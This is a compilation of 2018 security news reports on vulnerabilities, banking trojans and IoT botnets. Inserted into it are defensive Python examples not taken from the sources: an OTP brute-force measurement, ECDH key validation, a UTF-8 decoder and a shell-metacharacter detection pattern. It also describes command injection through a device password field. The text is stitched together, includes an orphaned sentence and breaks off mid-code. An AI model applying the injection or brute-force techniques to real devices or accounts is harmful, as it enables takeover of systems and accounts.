Founded in 2012 by Rakesh Soni (CEO) and Deepak Gupta (CTO), LoginRadius has concentrated on cIAM -- initially as a social login provider, but now the provider of a multi-faceted, cloud-based, full-function cIAM platform. In its six years it has grown largely without external capital funding (previously raising a total of $2.3 million in initial and seed funding); and it has achieved triple digit growth in its last two years.

With the demand for customer (as opposed to enterprise) identity and access management growing rapidly, the new funding is designed to ensure that the firm can expand to meet potential requirements. Driving this growth is the ongoing digital transformation of business. Commercial enterprises are no longer satisfied with identity alone, but seek complete identity profiles of their customers in order to provide a more personalized service.

This makes cIAM a very different requirement to enterprise IAM. While enterprise IAM is concerned with validating the identity of a relatively small and finite number of known company employees, cIAM needs to handle the identity and profile of an infinite number of potentially worldwide internet customers.

"In customer identity you do not control the identity," Soni told SecurityWeek: "you just define it. Control remains with the customers who decide whether they want to keep the identity, destroy the identity, whether they want to access 20 of your brands or just one. And because the system faces outwards rather than inwards, the compliance requirements that are absent in employee identity become extremely critical -- especially, for example, with GDPR and the other privacy regulations popping up throughout the world."

The scale is very different. "While most companies have a maximum of a few hundred thousand employees," he continued, "one of our biggest clients has 50 million identities. Those people can access the client from anywhere on the planet, and they need the system to be up and running 24/7. For employee IAM, if the system is down for ten or 15 minutes (especially out of business hours) the impact is minimal. But in the case of cIAM even small downtimes can damage revenue and impact brand satisfaction."

These requirements, he suggests, demand a cloud-based solution. "With increasing customer experience expectations and growing cybersecurity threats, enterprises need a modern cloud-based identity platform that can be the foundation for digital transformation and provide peace of mind when it comes to security. This funding is a testament to LoginRadius' ability to deliver on this promise to our customers and sets the foundation for our future growth."

The firm already has offices in London, San Francisco, Sydney, and Jaipur; and plans to double its workforce over the next 12 months.

"Customer identity is at the intersection of security, digital business and compliance. This requires significant expertise to build and maintain in-house, resulting in extended go-to market time," said Deepak Gupta. "LoginRadius provides the answer to this critical challenge with its out-of-the-box solution."

The LoginRadius cloud platform is built with RESTful APIs and open-source SDK libraries to allow developers to implement authentication, login interfaces and web SSO without worrying about back-end capabilities such as data management, disaster recovery, performance, system availability and scalability. It already serves more than 700 million identities, and handles 7.5 billion API calls per month.

"Forward-thinking companies are looking for secure, cloud-based identity solutions that can serve a global customer base and handle complex scenarios," commented Nagraj Kashyap, corporate vice president at Microsoft and global head of M12. LoginRadius is "delivering on their promise to simplify customer identity management, which allows enterprise companies to more easily achieve their digital transformation ambitions."

Researchers Resurrect Decade-Old Oracle Solaris Vulnerability
26.7.2018 securityweek

One of the Solaris vulnerabilities patched by Oracle with its July 2018 Critical Patch Update (CPU) exists due to an ineffective fix implemented by the company for a flaw first discovered in 2007.

The new vulnerability, identified by researchers at Trustwave and tracked as CVE-2018-2892, impacts the Availability Suite Service component in Oracle Solaris 10 and 11.3.

The security hole has been classified as high severity due to the fact that it allows an attacker to execute code with elevated privileges, but it cannot be exploited remotely without authentication.

“A local kernel ring0 code execution vulnerability exists in the Oracle Solaris AVS kernel component permitting arbitrary code execution and thus privilege escalation,” Trustwave wrote in an advisory. “The issue is the result of a signedness bug in the bounds checking of the 'SDBC_TEST_INIT' ioctl code sent to the '/dev/sdbc' device. The result is a call to copyin() with a user controllable destination pointer and length thereby facilitating an arbitrary kernel memory overwrite and thus arbitrary code execution in the context of the kernel.”

According to Trustwave, the vulnerability was originally discovered back in 2007 and its details were disclosed in 2009 at the CanSecWest security conference. The root cause of the issue is a combination of several arbitrary memory dereference bugs and an unbounded memory write bug.

Oracle released a patch sometime after the vulnerability was disclosed, but Trustwave discovered that the fix had been ineffective.

Exploitation of CVE-2018-2892 is “almost identical” to the original flaw, the most significant difference being related to the change in architecture between the open source OpenSolaris running on a 32-bit system and Oracle Solaris 11 running on a 64-bit system. Oracle discontinued OpenSolaris after acquiring Sun Microsystems in 2010.

Researchers believe the new vulnerability may exist due to some code introduced for testing purposes.

Another vulnerability patched by Oracle with its latest CPU is CVE-2018-2893, a critical flaw that allows attackers to remotely take control of WebLogic Server systems. The security hole has already been exploited in the wild to deliver cryptocurrency miners, backdoors and other types of malware.

Kronos Banking Trojan Has Returned
26.7.2018 securityweek

The Kronos banking Trojan is showing renewed strength and has been very active over the past several months, Proofpoint security researchers warn.

Kronos malware was first discovered in 2014 and maintained a steady presence on the threat landscape for a few years, before largely disappearing for a while. It uses man-in-the-browser (MiTB) attacks and webinjects to modify accessed web pages and steal user credentials, account information, and other data. It can also log keystrokes and has hidden VNC functionality.

Last year, the United States Federal Bureau of Investigation said that Kronos was built and distributed by British researcher Marcus Hutchins, who goes by the online handle of MalwareTech and who is known for stopping the WannaCry ransomware attack.

The new Kronos samples, which were observed in campaigns targeting users in Germany, Japan, and Poland, are connecting to a command and control (C&C) domain on the Tor network. There’s also speculation that the malware might have been rebranded to Osiris, but no hard evidence on this has emerged so far.

The first campaign carrying the new Kronos samples was observed on June 27, targeting German users with malicious documents attached to spam emails. The documents carried macros to download and execute the malware and the SmokeLoader Trojan downloader was used in some cases.

Targeting Japan, the second campaign was observed on July 13 and involved a malvertising chain. Malicious ads took users to a site where JavaScript injections redirected to the RIG exploit kit, which delivered SmokeLoader. The downloader would then drop Kronos onto the compromised machines.

The Poland campaign started on July 15 and involved fake invoice emails carrying malicious documents that attempted to exploit CVE-2017-11882 (the Equation Editor vulnerability) to download and execute Kronos.

The Kronos samples observed in all three campaigns were configured to use .onion domains for C&C purposes. The researchers also observed that webinjects were used in the German and Japanese campaigns, but none was seen in the attacks on Poland.

A fourth campaign observed on July 20 appeared to be work in progress. The Kronos samples were once again configured to use the Tor network and a test webinject was spotted.

The 2018 Kronos samples feature extensive code and string overlap with the older versions, abuse the same Windows API hashing technique and hashes, use the same string encryption technique, leverage the same webinject format, and use the same C&C protocol and encryption mechanism.

The C&C panel file layout is also similar to the older variants and a self-identifying string is also present in the malware. The major change, however, is the use of .onion C&C URLs and the Tor network to anonymize communications.

There is also some evidence to suggest that the malware might have been rebranded to Osiris (the Egyptian god of rebirth).

The new malware is being advertised on underground forums with capabilities that overlap with those observed in the new version of Kronos and at about the same size (350 KB); the researchers also observed a file-naming scheme in Kronos that appears to suggest a connection with Osiris.

“The reappearance of a successful and fairly high-profile banking Trojan, Kronos, is consistent with the increased prevalence of bankers across the threat landscape. […] While there is significant evidence that this malware is a new version or variant of Kronos, there is also some circumstantial evidence suggesting it has been rebranded and is being sold as the Osiris banking Trojan,” Proofpoint concludes.

Twitter Curbs Access for 143,000 Apps in New Crackdown
26.7.2018 securityweek

Twitter said Tuesday it had removed more than 143,000 apps from the messaging service since April in a fresh crackdown on "malicious" activity from automated accounts.

The San Francisco-based social network said it was tightening access to its application programming interfaces (APIs), which allow developers to make automated Twitter posts.

"We're committed to providing access to our platform to developers whose products and services make Twitter a better place," said Twitter senior product management director Rob Johnson.

"However, recognizing the challenges facing Twitter and the public -- from spam and malicious automation to surveillance and invasions of privacy -- we're taking additional steps to ensure that our developer platform works in service of the overall health of conversation on Twitter."

Johnson offered no details on the revoked apps, but Twitter has been under pressure over automated accounts or "bots" which spread misinformation or falsely amplify a person or political cause.

"We do not tolerate the use of our APIs to produce spam, manipulate conversations, or invade the privacy of people using Twitter," he said.

"We're continuing to invest in building out improved tools and processes to help us stop malicious apps faster and more efficiently."

As of Tuesday, any developer seeking access to create a Twitter app will have to go through a new application process, providing details of how they will use the service.

"We're committed to supporting all developers who want to build high-quality, policy-compliant experiences using our developer platform and APIs, while reducing the impact of bad actors on our service," Johnson said.

Automated accounts are not always malicious -- some are designed to tweet out emergency alerts, art exhibits or the release of a Netflix program -- but "bots" have been blamed for spreading hoaxes and misinformation in a bid to manipulate public opinion.

Chrome Now Marks HTTP Sites as "Not Secure"
26.7.2018 securityweek Security

The latest version of Google's Chrome web browser (Chrome 68) represents another step the search giant is making toward a more secure web: the browser now marks HTTP sites as “Not Secure.”

The change comes three and a half years after the Chrome Security Team launched the proposal to mark all HTTP sites as affirmatively non-secure, so as to make it clearer for users that HTTP provides no data security.

When websites are loaded over HTTP, the connection is not encrypted, meaning not only that attackers on the network can access the transmitted information, but also that they can modify the contents of sites before they are served to the user.

HTTPS, on the other hand, encrypts the connection, meaning that eavesdroppers can’t access the transmitted data and that users’ information remains private.

Google, which has long advocated the adoption of HTTPS across the web, is for now only marking HTTP pages with a gray warning in Chrome. Later this year, however, the browser will display a red “Not Secure” alert for HTTP pages that require users to enter data.

The goal, however, is to incentivize site owners to adopt HTTPS. For that, Google is also planning on removing the (green) “Secure” wording and HTTPS scheme from Chrome in September 2018.

This means that the browser will no longer display positive security indicators, but will warn on insecure connections. Starting May 1, Chrome is also warning when encountering certificates that are not compliant with the Chromium Certificate Transparency (CT) Policy.

“To ensure that the Not Secure warning is not displayed for your pages in Chrome 68, we recommend migrating your site to HTTPS,” Google tells website admins.

According to Google’s Transparency Report, HTTPS usage has increased considerably worldwide, across all platforms: over 75% of pages are served over an encrypted connection on Chrome OS, macOS, Android, and Windows. The same applies to 66% of pages served to Linux users.

To help site admins move to HTTPS, the Internet giant has published a migration guide that includes recommendations and which also addresses common migration concerns such as SEO, ad revenue and performance impact.

In addition to marking HTTP sites as Not Secure, Chrome 68 includes patches for a total of 42 vulnerabilities, 29 of which were reported by external researchers: 5 High severity flaws, 19 Medium risk bugs, and 5 Low severity issues.

The 5 High risk issues include a stack buffer overflow in Skia, a heap buffer overflow in WebGL, a use after free in WebRTC, a heap buffer overflow in WebRTC, and a type confusion in WebRTC.

The remaining flaws included use after free, same origin policy bypass, heap buffer overflow, URL spoof, CORS bypass, permissions bypass, type confusion, integer overflow, local user privilege escalation, cross origin information leak, UI spoof, local file information leak, request privilege escalation, and cross origin information leak.

Car Sharing Apps Vulnerable to Hacker Attacks: Kaspersky
26.7.2018 securityweek

Researchers at Kaspersky Lab have analyzed over a dozen mobile applications provided by car sharing companies and discovered serious security holes that can be exploited to obtain personal information and even steal vehicles.

The security firm’s employees have investigated a total of 13 car sharing apps for Android. The targeted applications are used in the U.S., Europe and Russia, and they have been downloaded more than 1 million times from Google Play.

Car sharing applications can be a tempting target for malicious actors for several reasons. They could hijack the legitimate user’s account in order to drive cars without actually paying for them, steal vehicles for their parts or to commit crimes, track users’ locations, and obtain the account holder’s personal information.

While some of these are theoretical risks, Kaspersky pointed out that cybercriminals are already selling hijacked car sharing accounts. The sellers claim these accounts can be useful for several things, including for driving a car without a license.

Researchers first checked to see if the applications can be reverse engineered and if they can be executed with root privileges. Failure to prevent unauthorized individuals from reverse engineering an application increases the risk of someone creating a malicious version of the app. Allowing an app to run on a rooted device enables an attacker to access sensitive information.

Only one of the apps had reverse engineering protections in place, but it did not prevent execution on a rooted device. On the other hand, the app in question did encrypt sensitive data, which mitigates the risk introduced by allowing it to run with elevated privileges.

Kaspersky also verified the strength of the passwords protecting car sharing accounts. Experts found that in many cases developers set weak passwords or provide users short one-time verification codes. This, combined with the lack of a limitation mechanism for the number of login attempts, makes it easier to launch brute-force attacks and obtain a password or one-time code.

Brute force attack on car sharing app
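
The weakness described above is the combination of a short one-time code with no limit on verification attempts. The following is an added example, not code from Kaspersky or from any of the tested apps: a server-side one-time-code verifier in Python in which the attempt budget is tied to the challenge itself, together with two helpers that quantify what the missing limit costs. `guesses_needed` tries every code in order against a single challenge and reports whether the verifier accepted the correct one or locked the challenge first; `success_probability` gives the chance that an exhausted budget hits a uniformly random code. The class and function names, the four-digit code length and the budget of five attempts are constructed for the illustration.

```python
import hmac
import secrets
from dataclasses import dataclass
from fractions import Fraction
from typing import Optional


@dataclass
class OtpChallenge:
    code: str                      # the code sent to the user (e.g. by SMS)
    max_attempts: Optional[int]    # None models the "no limit" behaviour the research found
    failures: int = 0
    consumed: bool = False         # single use: spent once accepted or locked


class OtpVerifier:
    """Server-side one-time-code check with a per-challenge attempt limit.

    The budget belongs to the challenge, not to the client IP or session,
    so reconnecting from elsewhere does not reset it."""

    def __init__(self, digits: int = 4, max_attempts: Optional[int] = None):
        self.digits = digits
        self.max_attempts = max_attempts

    def issue(self, code: Optional[str] = None) -> OtpChallenge:
        if code is None:           # real path: cryptographically random, zero-padded code
            code = f"{secrets.randbelow(10 ** self.digits):0{self.digits}d}"
        return OtpChallenge(code=code, max_attempts=self.max_attempts)

    def verify(self, challenge: OtpChallenge, guess: str) -> str:
        """Returns 'ok', 'wrong' or 'locked'."""
        if challenge.consumed:
            return "locked"
        if challenge.max_attempts is not None and challenge.failures >= challenge.max_attempts:
            challenge.consumed = True    # budget exhausted: this code is dead, issue a new one
            return "locked"
        # Constant-time comparison so response timing does not leak matching prefixes.
        if hmac.compare_digest(challenge.code.encode(), guess.encode()):
            challenge.consumed = True
            return "ok"
        challenge.failures += 1
        return "wrong"


def guesses_needed(digits: int, max_attempts: Optional[int],
                   code: Optional[str] = None) -> Optional[int]:
    """Submit every possible code in ascending order against one challenge.
    Returns the attempt number on which the verifier accepted the code, or
    None if the challenge locked first. Measures the effect of the limit."""
    verifier = OtpVerifier(digits, max_attempts)
    challenge = verifier.issue(code)
    for attempt, candidate in enumerate(range(10 ** digits), start=1):
        outcome = verifier.verify(challenge, f"{candidate:0{digits}d}")
        if outcome == "ok":
            return attempt
        if outcome == "locked":
            return None
    return None


def success_probability(digits: int, max_attempts: int) -> Fraction:
    """Chance that a guesser who uses the whole budget hits a uniformly random code."""
    return Fraction(min(max_attempts, 10 ** digits), 10 ** digits)
```

Without a limit a four-digit code always falls within 10,000 attempts; with a budget of five attempts per challenge the same code is guessed with probability 1/2000, and a longer code or a smaller budget shrinks that further. The budget must be enforced server-side and per challenge, since a client-side counter or a per-connection counter is trivially reset.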

The users of car sharing apps can often be identified on social media – it’s not uncommon for them to post pictures while driving and use a specific hashtag – and they often unwittingly expose their phone number on these websites.

Phone numbers are important for attackers as this piece of information can represent the username and it’s where the car sharing company sends one-time passwords.

Researchers also noticed that while the applications use HTTPS for communications with the server, they all fail to check the server’s certificate, making it easier to launch man-in-the-middle (MitM) attacks and intercept potentially sensitive data.

Finally, experts checked if the apps include any overlay protections. Specifically, they verified if developers implemented any mechanisms that would prevent attackers who already have access to a smartphone from showing a fake window (i.e. a phishing page) on top of the legitimate car sharing application. Unfortunately, none of the tested apps protect users against this threat.

Kaspersky has not named any of the tested applications, but did point out that the ones made by companies in the U.S. and Europe are more secure than those of Russian firms.

“Our research concluded that, in their current state, applications for car sharing services are not ready to withstand malware attacks,” explained Victor Chebyshev, security expert at Kaspersky Lab. “While we have not yet detected any cases of sophisticated attacks against car sharing services, cybercriminals understand the value that such apps hold, and existing offers on the black market point to the fact that vendors do not have much time to remove the vulnerabilities.”

Big Tech Firms Agree on 'Data Portability' Plan
26.7.2018 securityweek IT

Facebook, Google, Microsoft and Twitter unveiled plans Friday to make it easier for users to take their personal data and leave one online service for another.

The "Data Transfer Project" unveiled by the companies responds to concerns about the growing influence of internet platforms and to users' concerns about control of the personal information they share online.

"Users should be in control of their data on the web, part of this is the ability to move their data," the companies said on the project website.

Data portability has been a goal of many privacy activists, and is enshrined in some country regulations including Europe's new General Data Protection Regulation.

Currently, people can download their data from an online service, without a guarantee it will be possible or feasible to upload the information to a new service.

The situation can result in people feeling anchored to a service or app, even if they are unhappy with it or an enticing option arises, because of photos, contacts, posts and other accumulated data.

"Making it easier for individuals to choose among services facilitates competition, empowers individuals to try new services and enables them to choose the offering that best suits their needs," the project said at its website.

"There are many use cases for users porting data directly between services, some we know about today, and some we have yet to discover."

Reasons for shifting personal data could include abandoning an old service, trying a new one, or simply backing up information to keep it safe.

The project was formed two years ago and remains in a development phase.

Disclosure of the effort comes amid heightened scrutiny over the potential of internet companies to abuse positions of power and the right of people to control their online data.

Hide ‘N Seek botnet also includes exploits for home automation systems
25.7.2018 securityaffairs

Security experts from Fortinet have discovered that the Hide ‘N Seek botnet is now targeting vulnerabilities in home automation systems.
The Hide ‘N Seek botnet was first spotted on January 10th when it was targeting home routers and IP cameras.

It was first spotted on January 10th by malware researchers from Bitdefender; it then disappeared for a few days and reappeared a few weeks later, infecting more than 20,000 devices in less than a week.

Researchers at Bitdefender found similarities between the Hide ‘N Seek botnet and the Hajime botnet. Unlike Mirai, Hajime does not use C&C servers; instead, it implements a peer-to-peer network.

Bitdefender experts discovered that Hide ‘N Seek botnet exploited the CVE-2016-10401 flaw, and other vulnerabilities to propagate malicious code and steal user data.

In May the botnet infected over 90,000 unique devices. More recently, researchers from Qihoo 360’s NetLab discovered that the bot was also targeting AVTECH webcams, Cisco Linksys routers, and OrientDB and CouchDB database servers.

Hide ‘N Seek timeline

Fortinet experts have compared three different versions of the bot over time.

The security firm reports that the latest version of the bot has a configuration made up of 110 entries and 9 exploits.

“We can easily spot the difference between them simply by the number of entries each one has. We are particularly interested in the exploits that each version is using.” states Fortinet.

“The first variant, as shown below, has a configuration made up of 60 entries that includes 2 exploits, the second has 81 entries and 6 exploits, while the most recent now has 110 entries and 9 exploits.”

Hide ‘N Seek authors recently included an exploit for a HomeMatic Zentrale CCU2 remote code execution vulnerability; the malicious code allows the botnet to target devices in smart homes controlled by the HomeMatic central unit.

The bot also includes the exploit for an RCE issue in the Belkin NetCam devices.

The experts believe the author of the Hide ‘N Seek botnet will continue to improve the bot by adding new exploits to target a broad range of devices.

The security researchers also say they expect the threat to add more functions in future iterations, as well as to expand its usage of publicly available exploits.

“HNS has been aggressively adding exploits and targeting more platforms and devices to increase its propagation scope. Utilizing freshly released PoC exploits to its arsenal increases the chance for it to be the first to infect these vulnerable devices,” Fortinet concludes.

“With this new understanding of this malware’s recent behaviour we expect the next alterations to include more functions as well as the usage of publicly available exploits.”

CVE-2018-5383 Bluetooth flaw allows attackers to monitor and manipulate traffic
25.7.2018 securityaffairs

Security researchers have found a high severity flaw (CVE-2018-5383) affecting some Bluetooth implementations that allows attackers to monitor and manipulate traffic.
Security researchers at the Israel Institute of Technology have found a high severity vulnerability affecting some Bluetooth implementations that could be exploited by an unauthenticated remote attacker in physical proximity of two targeted devices to monitor and manipulate the traffic they exchange.

The issue, tracked as CVE-2018-5383, affects the Secure Simple Pairing and LE Secure Connections features; it affects firmware or drivers from some major vendors including Apple, Broadcom, Intel, and Qualcomm.

The Bluetooth specifications recommend that devices supporting the above features validate the public key exchanged during the pairing process.

Experts from Bluetooth Special Interest Group (SIG), the group that oversees the development of Bluetooth standards, explained that some vendors do not implement public key validation.

Basically, a nearby attacker can launch a man-in-the-middle (MitM) attack and obtain the encryption key, then monitor and manipulate the traffic exchanged by the devices.

“For an attack to be successful, an attacking device would need to be within wireless range of two vulnerable Bluetooth devices that were going through a pairing procedure,” reads the advisory published by the Bluetooth SIG.

“The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful.”

The Bluetooth SIG has addressed the vulnerability by updating the specification; it is now mandatory for products to implement public key validation during the pairing process.

Moreover, the Bluetooth SIG has also added testing for this vulnerability within its Bluetooth Qualification Process.

The CERT/CC published a security advisory on the flaw that includes technical details.

“Bluetooth firmware or operating system software drivers may not sufficiently validate elliptic curve parameters used to generate public keys during a Diffie-Hellman key exchange, which may allow a remote attacker to obtain the encryption key used by the device.” reads the advisory published by the CERT/CC.
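
What “validate the public key” means in practice, as an added example that is not code from the Bluetooth SIG, CERT/CC or any of the named vendors: a pure-Python ECDH exchange on NIST P-256 in which the peer’s public point is checked to lie on the curve and within range before any scalar multiplication is performed with our private key. The Bluetooth pairing procedures use NIST curves; the example uses P-256 with its published domain parameters. The two private scalars are constructed, and the arithmetic is plain double-and-add for readability, not the constant-time code a real stack needs. Because P-256 has cofactor 1, an on-curve point that is not the point at infinity cannot lie in a small subgroup, so the on-curve check alone removes the class of invalid-point inputs the CERT/CC advisory describes.

```python
# NIST P-256 domain parameters (public constants from FIPS 186-4 / SEC 2).
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)

# Constructed private scalars for the two pairing devices (illustration only).
ALICE_PRIV = 0x3a1f0c0d2e3b4a5968778695a4b3c2d1e0f0a1b2c3d4e5f60718293a4b5c6d7e
BOB_PRIV = 0x7e6d5c4b3a291807f6e5d4c3b2a1f0e0d1c2b3a495867768594a3b2e0d0c1f3a

# A point is an (x, y) tuple of ints; None stands for the point at infinity.


def is_valid_public_key(point):
    """The check the affected implementations skipped: the received key must
    be an affine point on P-256 with both coordinates in [0, p). With
    cofactor 1, on-curve and not-infinity also rules out small-subgroup points."""
    if point is None:
        return False
    x, y = point
    if not (0 <= x < P and 0 <= y < P):
        return False
    return (y * y - (x * x * x + A * x + B)) % P == 0


def point_add(p1, p2):
    """Affine point addition (doubling when p1 == p2) on P-256."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None                       # p1 == -p2, result is infinity
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    y3 = (lam * (x1 - x3) - y1) % P
    return (x3, y3)


def scalar_mult(k, point):
    """Double-and-add scalar multiplication (not constant-time; illustration)."""
    result = None
    addend = point
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result


def ecdh_shared_secret(private_key, peer_public):
    """Derive the ECDH shared secret (x-coordinate) from our private scalar
    and the peer's public point, refusing to operate on an unvalidated point.
    Returns None when validation fails so the caller aborts the pairing."""
    if not is_valid_public_key(peer_public):
        return None
    shared = scalar_mult(private_key % N, peer_public)
    return None if shared is None else shared[0]
```

The ordering is the point: validation happens before the private scalar touches the peer's point. A stack that multiplies first and validates afterwards (or never) has already leaked information through the result it computed on an attacker-chosen point.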

According to the Bluetooth SIG, there is no evidence that the CVE-2018-5383 flaw has been exploited in attacks in the wild.

“There is no evidence that the vulnerability has been exploited maliciously and the Bluetooth SIG is not aware of any devices implementing the attack having been developed, including by the researchers who identified the vulnerability,” added the Bluetooth SIG.

Both Apple and Intel have rolled out security patches to address the CVE-2018-5383 vulnerability.

According to Intel, the vulnerability affects the Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC product families.

The vendor has already rolled out both software and firmware updates to fix the issue.

According to Broadcom, some of its products supporting Bluetooth 2.1 or newer technology may be impacted; it also added that security fixes were already provided to OEM customers.

Apache Software Foundation fixes important flaws in Apache Tomcat
25.7.2018 securityaffairs

The Apache Software Foundation has rolled out security updates for the Tomcat application server that address several flaws.
The Apache Software Foundation has released security updates for the Tomcat application server that address several vulnerabilities, including issues that trigger a denial-of-service (DoS) condition or can lead to information disclosure.

Apache Tomcat is an open-source Java Servlet Container that implements several Java EE specifications including Java Servlet, JavaServer Pages (JSP), Java EL, and WebSocket, and provides a “pure Java” HTTP web server environment in which Java code can run.

It has been estimated that Tomcat has a market share of over 60 percent.

The first flaw addressed by the Apache Software Foundation is CVE-2018-8037, an important bug in the tracking of connection closures that can lead to the reuse of user sessions in a new connection.

The flaw affects Tomcat versions 9.0.0.M9 through 9.0.9 and 8.5.5 through 8.5.31. The Tomcat 9.0.10 and 8.5.32 releases address the vulnerability.

Another important issue addressed by the Foundation is CVE-2018-1336: improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder, triggering a denial-of-service condition.

The vulnerability affects Tomcat versions 7.0.x, 8.0.x, 8.5.x and 9.0.x.

Versions 9.0.7, 8.5.32, 8.0.52 and 7.0.90 address the vulnerability.
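
The general lesson of a decoder that can loop forever on crafted input is that the decoding loop must make forward progress on every iteration, including on malformed or truncated input. The following is an added example in Python, not Tomcat's decoder and not a reproduction of CVE-2018-1336: a byte-at-a-time UTF-8 decoder that handles supplementary characters (code points above U+FFFF, which become surrogate pairs in UTF-16 as Java strings store them) and consumes at least one byte per iteration whatever the input. Truncated sequences, stray continuation bytes, overlong forms and encoded surrogates each yield U+FFFD rather than a retry. The function names and the sample inputs are constructed.

```python
REPLACEMENT = 0xFFFD


def decode_utf8(data: bytes) -> list:
    """Decode UTF-8 to a list of code points. Loop invariant: every pass through
    the while loop advances i by at least one byte, so the loop terminates for
    any input, and len(result) <= len(data)."""
    out = []
    i, n = 0, len(data)
    while i < n:
        b0 = data[i]
        if b0 < 0x80:                          # one-byte sequence (ASCII)
            out.append(b0)
            i += 1
            continue
        if 0xC2 <= b0 <= 0xDF:                 # two-byte lead
            need, cp, lower = 1, b0 & 0x1F, 0x80
        elif 0xE0 <= b0 <= 0xEF:               # three-byte lead
            need, cp, lower = 2, b0 & 0x0F, 0x800
        elif 0xF0 <= b0 <= 0xF4:               # four-byte lead: supplementary planes
            need, cp, lower = 3, b0 & 0x07, 0x10000
        else:                                  # stray continuation byte or invalid lead (C0, C1, F5..FF)
            out.append(REPLACEMENT)
            i += 1
            continue
        if i + need >= n:                      # sequence truncated by end of input
            out.append(REPLACEMENT)
            i = n
            continue
        consumed = 1
        for j in range(1, need + 1):
            c = data[i + j]
            if c & 0xC0 != 0x80:               # not a continuation byte: stop here
                break
            cp = (cp << 6) | (c & 0x3F)
            consumed += 1
        else:
            # Full sequence read; reject overlong forms, out-of-range values and surrogates.
            if cp < lower or cp > 0x10FFFF or 0xD800 <= cp <= 0xDFFF:
                cp = REPLACEMENT
            out.append(cp)
            i += consumed
            continue
        out.append(REPLACEMENT)                # bad continuation byte; it is re-read as a lead byte
        i += consumed
    return out


def to_utf16_units(cp: int) -> list:
    """Split one code point into UTF-16 code units: one unit for the BMP,
    a high/low surrogate pair for supplementary characters."""
    if cp < 0x10000:
        return [cp]
    v = cp - 0x10000
    return [0xD800 + (v >> 10), 0xDC00 + (v & 0x3FF)]


def utf8_to_utf16(data: bytes) -> list:
    """UTF-8 bytes to the UTF-16 code units a Java String would hold."""
    units = []
    for cp in decode_utf8(data):
        units.extend(to_utf16_units(cp))
    return units
```

The supplementary-character case is the one worth testing explicitly: a four-byte sequence produces two output units from one input character, so any bookkeeping that assumes one unit per character (remaining capacity, loop bounds) is where an off-by-one or overflow turns into a stall.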

The Apache Software Foundation also fixed a low severity security constraints bypass tracked as CVE-2018-8034.

“The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default,” reads the security advisory.

The vulnerability has been addressed with the release of the latest Tomcat 7.0.x, 8.0.x, 8.5.x and 9.0.x versions.

The US-CERT has released a security alert that urges users to apply security updates.

“The Apache Software Foundation has released security updates to address vulnerabilities in Apache Tomcat versions 9.0.0.M9 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86. A remote attacker could exploit one of these vulnerabilities to obtain sensitive information.” reads the security advisory published by the US-CERT.

“NCCIC encourages users and administrators to review the Apache security advisories for CVE-2018-8037 and CVE-2018-1336 and apply the necessary updates.”

Apache Tomcat vulnerabilities are less likely to be exploited in the wild.

Ignite is impacted by two security holes, both of which could lead to arbitrary code execution.

The Death botnet grows, targeting AVTech devices with a two-year-old exploit
25.7.2018 securityaffairs BotNet

A new botnet, tracked as Death botnet has appeared in the threat landscape and is gathering unpatched AVTech devices with an old exploit.
A new botnet, tracked as ‘Death botnet,’ has appeared in the threat landscape; its author, who goes online by the moniker EliteLands, is gathering unpatched AVTech devices into the malicious infrastructure.

AVTech is one of the world’s leading CCTV manufacturers and the largest publicly listed company in the Taiwanese surveillance industry.

EliteLands is using a two-year-old exploit that can trigger tens of well-known vulnerabilities in the AVTech firmware. Many of the vendor’s products currently run the vulnerable firmware, including DVRs, NVRs, and IP cameras.

The security expert Ankit Anubhav, who discovered the Death botnet, revealed that outdated firmware versions expose the AVTech device’s passwords in cleartext. The flaw could be exploited by an unauthenticated attacker to add users to existing devices.

Ankit Anubhav told Bleeping Computer that EliteLands is exploiting the issues to add new users to AVTech devices.

The expert explained that older firmware is vulnerable to a command injection vulnerability in the password field: an attacker can supply a shell command in this field, have it executed, and take over the device.

“So, if I put reboot as password, the AVTech system gets rebooted,” Anubhav explained. “Of course, the Death botnet is doing much more than just rebooting.”

AVTech rolled out security updates for the flaw at the beginning of 2017, but evidently many devices are still running old firmware. Recently, another botnet, Hide ‘N Seek (HNS), started leveraging the same issue ((new) AVTECH RCE) to target IoT devices.

At the end of June, AVTech published a security alert regarding the attacks exploiting the above flaw.

Anubhav confirmed that EliteLands is gathering devices for his Death botnet by targeting exposed devices with different payloads in the password field.

The latest version of the payload used by EliteLands adds accounts with a lifespan of five minutes that execute his payload and are then deleted from the device.

“This is like a burner account,” Anubhav told Bleeping Computer. “Usually people don’t make new user accounts with access of only 5 minutes.”
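The injection described above lives in a single untrusted field, which makes it a good fit for both a server-side input check and a log-based detection. The following is an added example, not code from the article, from AVTech or from Anubhav: a credential-field validator of the kind a CGI handler should apply, and a scan over web-server access logs that flags password parameters carrying shell metacharacters. The log format and all IP addresses and paths are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added example (not AVTech code). Characters and sequences that let a value
# escape into a shell when a CGI handler concatenates it into a command line.
SHELL_META = re.compile(r"[;|&`\n\r]|\$\(|\$\{")

# Parameter names treated as credential fields (constructed list).
CREDENTIAL_PARAMS = {"password", "passwd", "pwd", "pass"}


def has_injection_marker(value: str) -> bool:
    """True if the value contains anything a shell would interpret."""
    return SHELL_META.search(value) is not None


def is_safe_credential(value: str, max_len: int = 64) -> bool:
    """Server-side check before a password field is used: bounded length and
    no shell metacharacters. The real fix is never to hand the value to a
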